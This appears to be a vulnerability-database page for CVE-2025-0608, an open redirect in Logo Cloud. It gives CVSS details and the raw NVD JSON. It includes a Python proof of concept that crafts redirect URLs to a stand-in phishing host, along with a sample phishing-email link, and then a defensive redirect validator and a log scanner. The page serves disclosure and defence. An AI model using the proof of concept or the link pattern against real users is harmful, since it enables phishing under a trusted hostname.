Security Vulnerability Report
CVE-2025-0608 CVSS 5.5 MEDIUM

Published: 2025-10-06 10:15:34
Last Modified: 2026-04-15 00:35:42

Description

URL Redirection to Untrusted Site ('Open Redirect') vulnerability in Logo Software Inc. Logo Cloud allows Phishing, Forceful Browsing. This issue affects Logo Cloud: before 2025.R6.

Weakness: CWE-601 (URL Redirection to Untrusted Site). An attacker who gets a victim to open a crafted link to the Logo Cloud host has the application forward the victim to a destination the attacker controls, so a phishing page arrives under cover of the application's own hostname.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L
(Network attack, low complexity, low privileges required, user interaction required: the victim must follow the crafted link. Scope unchanged; low confidentiality, integrity and availability impact. Exploitability subscore 2.1, impact subscore 3.4.)

Configurations (Affected Products)

No CPE configuration data is available in the NVD record (vulnStatus: Deferred).

Affected per the advisory text: Logo Cloud, all versions before 2025.R6.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-0608 Logo Cloud Open Redirect PoC
# This PoC demonstrates the open redirect vulnerability in Logo Cloud.
# The advisory (USOM TR-25-0318) does not name the vulnerable endpoint or
# parameter; the path and parameter below are placeholders that must be
# confirmed against the target before use.
import requests

# Target Logo Cloud endpoint with redirect parameter
target_url = "https://[target-logo-cloud-domain]/redirect"  # Replace with actual endpoint

# Malicious destination URL controlled by attacker
malicious_redirect = "https://evil-phishing-site.com/fake-login"

# Construct the exploit URL.
# The vulnerable parameter ('redirect_url', 'next' and 'returnUrl' are the
# usual names) is not validated against the application's own host.
payload_url = f"{target_url}?redirect_url={malicious_redirect}"
print(f"[*] Crafted malicious URL: {payload_url}")

# Send the request without following redirects so the Location header can be
# inspected. The CVSS vector has PR:L, so an authenticated session may be
# required: pass cookies=... if the endpoint needs one.
response = requests.get(payload_url, allow_redirects=False, timeout=10)

# Check if the server returns a 3xx redirect to the malicious site
if response.status_code in (301, 302, 303, 307, 308):
    location = response.headers.get("Location", "")
    if "evil-phishing-site.com" in location:
        print("[+] Vulnerability confirmed! Open redirect to untrusted site detected.")
        print(f"[+] Server redirected to: {location}")
    else:
        print("[-] Redirect detected but target is not the malicious site.")
else:
    print(f"[-] No redirect detected. Status code: {response.status_code}")

# Example URL that would be sent to victim in phishing email:
# https://[target-logo-cloud-domain]/redirect?redirect_url=https://evil-phishing-site.com/fake-login
# When victim clicks, they are redirected to the attacker's phishing page
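The PoC above only shows the failure. The following is an added example, written for this page and not Logo Software's code or anything from the advisory: it implements the check an application must apply to a user-supplied redirect target to close CWE-601, and reuses that same rule to pick exploitation attempts out of an access log. The host names (erp.example.com, sso.example.com), the parameter names, the function names and the log lines are all constructed assumptions; the advisory names none of them.

```python
# Added example (not Logo Software's code): validating a user-supplied redirect
# target, which is the fix for CWE-601, and re-using the same rule to pick
# exploitation attempts out of an access log. Host names, parameter names and
# log lines are constructed for this example; the advisory gives none of them.
import re
from urllib.parse import urlsplit, urlunsplit, parse_qs

# Assumption: the application's own hosts. Only these may be redirect targets.
ALLOWED_HOSTS = frozenset({"erp.example.com", "sso.example.com"})
DEFAULT_TARGET = "/"
# Common names for a "where to go after login" parameter (assumed, not from the advisory).
REDIRECT_PARAMS = frozenset({"redirect_url", "next", "returnUrl", "ReturnUrl", "url"})


def safe_redirect_target(target, allowed_hosts=ALLOWED_HOSTS, default=DEFAULT_TARGET):
    """Return `target` if it stays on an allowed host, otherwise `default`.

    Rejects the usual bypasses: protocol-relative '//evil', backslash
    '/\\evil' (browsers treat '\\' as '/'), scheme-only 'https:evil',
    userinfo 'https://good@evil', non-http schemes such as 'javascript:',
    and targets containing control characters that browsers silently drop.
    """
    if not target:
        return default
    # Browsers strip tab/newline inside URLs; treat any control character as hostile.
    if any(ord(ch) < 0x20 or ch == "\x7f" for ch in target):
        return default
    # Normalise '\' to '/' so urlsplit sees what the browser will see.
    target = target.strip().replace("\\", "/")
    try:
        parts = urlsplit(target)
    except ValueError:  # e.g. a malformed IPv6 literal
        return default

    if parts.scheme:
        # Absolute URL: only http(s), and only to an allowed host.
        # 'https:evil' parses with an empty host and is rejected here.
        if parts.scheme not in ("http", "https"):
            return default
        if parts.hostname is None or parts.hostname not in allowed_hosts:
            return default
        return urlunsplit(parts)
    if parts.netloc:
        # '//evil' without a scheme: the browser reuses the current scheme.
        if parts.hostname is None or parts.hostname not in allowed_hosts:
            return default
        return urlunsplit(parts)
    # Relative target: a path rooted at '/' cannot leave the current origin.
    if not parts.path.startswith("/"):
        return default
    return urlunsplit(parts)


# Constructed access-log lines (combined-log style), not from a real Logo Cloud host.
SAMPLE_LOG = """\
10.0.0.5 - - [06/Oct/2025:10:15:34 +0300] "GET /login?next=/dashboard HTTP/1.1" 302 0
10.0.0.7 - - [06/Oct/2025:10:16:02 +0300] "GET /redirect?redirect_url=https://evil-phishing-site.com/fake-login HTTP/1.1" 302 0
10.0.0.9 - - [06/Oct/2025:10:16:40 +0300] "GET /redirect?returnUrl=//evil-phishing-site.com HTTP/1.1" 302 0
10.0.0.9 - - [06/Oct/2025:10:17:01 +0300] "GET /redirect?returnUrl=https://sso.example.com/ok HTTP/1.1" 302 0
"""

_REQUEST_LINE = re.compile(r'"(?:GET|POST) (?P<path>\S+) HTTP/')


def flag_offsite_redirects(log_text, allowed_hosts=ALLOWED_HOSTS):
    """Return (line_no, param, value) for every request whose redirect
    parameter would have sent the user off the allowed hosts."""
    findings = []
    for line_no, line in enumerate(log_text.splitlines(), 1):
        match = _REQUEST_LINE.search(line)
        if not match:
            continue
        query = urlsplit(match.group("path")).query
        for name, values in parse_qs(query, keep_blank_values=True).items():
            if name not in REDIRECT_PARAMS:
                continue
            for value in values:
                # Anything the validator would have rewritten is an attempt worth looking at.
                if safe_redirect_target(value, allowed_hosts) != value:
                    findings.append((line_no, name, value))
    return findings


if __name__ == "__main__":
    for line_no, name, value in flag_offsite_redirects(SAMPLE_LOG):
        print(f"line {line_no}: {name}={value!r} would leave the allowed hosts")
```

The validator compares the parsed hostname, not a string prefix, which is why `https://erp.example.com@evil-phishing-site.com/` and `https://erp.example.com.evil-phishing-site.com/` are both refused; a prefix check on the raw string would pass both. The log check flags lines 2 and 3 of the sample and leaves the two legitimate redirects alone.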

References

https://www.usom.gov.tr/bildirim/tr-25-0318 (USOM advisory, the only reference in the NVD record)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-0608",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-06T10:15:33.653",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "URL Redirection to Untrusted Site ('Open Redirect') vulnerability in Logo Software Inc. Logo Cloud allows Phishing, Forceful Browsing.This issue affects Logo Cloud: before 2025.R6."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L",
            "baseScore": 5.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 2.1,
          "impactScore": 3.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-601"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://www.usom.gov.tr/bildirim/tr-25-0318",
        "source": "[email protected]"
      }
    ]
  }
}